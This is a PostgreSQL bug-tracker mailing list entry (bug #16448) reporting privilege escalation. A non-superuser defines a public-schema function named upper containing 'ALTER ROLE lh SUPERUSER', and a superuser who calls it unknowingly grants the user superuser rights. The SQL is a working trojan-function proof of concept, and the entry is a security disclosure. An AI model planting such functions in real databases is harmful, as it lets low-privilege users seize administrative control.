Home > mailing lists

BUG #16448: Remote code execution vulnerability - Mailing list pgsql-bugs

From	PG Bug reporting form
Subject	BUG #16448: Remote code execution vulnerability
Date	May 18, 2020 12:14:49
Msg-id	16448-b1ae7a058a160c8e@postgresql.org Whole thread Raw
Responses	Re: BUG #16448: Remote code execution vulnerability Re: BUG #16448: Remote code execution vulnerability
List	pgsql-bugs

Tree view

The following bug has been logged on the website:

Bug reference:      16448
Logged by:          yi Ding
Email address:      abcxiaod@126.com
PostgreSQL version: 10.12
Operating system:   linux
Description:

A common user created a function in the public space and added some
malicious codes in the function, when other users with superuser rights call
this function, the malicious code will be executed , so as to achieve the
purpose of remote malicious code execution.

   First, Non-superuser lh defines a function named upper, which contains
the statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT ‘lh’::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;
 
Second, Superuser pg01 will execute the above statement after calling the
upper function, whice will change user lh to a super user.

pgsql-bugs by date:

From: PG Bug reporting form
Date: 18 May 2020, 12:11:57
Subject: BUG #16447: The query field of the pg_stat_activity table displays the clear text of the password.

From: PG Bug reporting form
Date: 18 May 2020, 12:16:31
Subject: BUG #16449: Log file and the query field of the pg_stat_statements table display clear text password.

BUG #16448: Remote code execution vulnerability - Mailing list pgsql-bugs

Previous

Next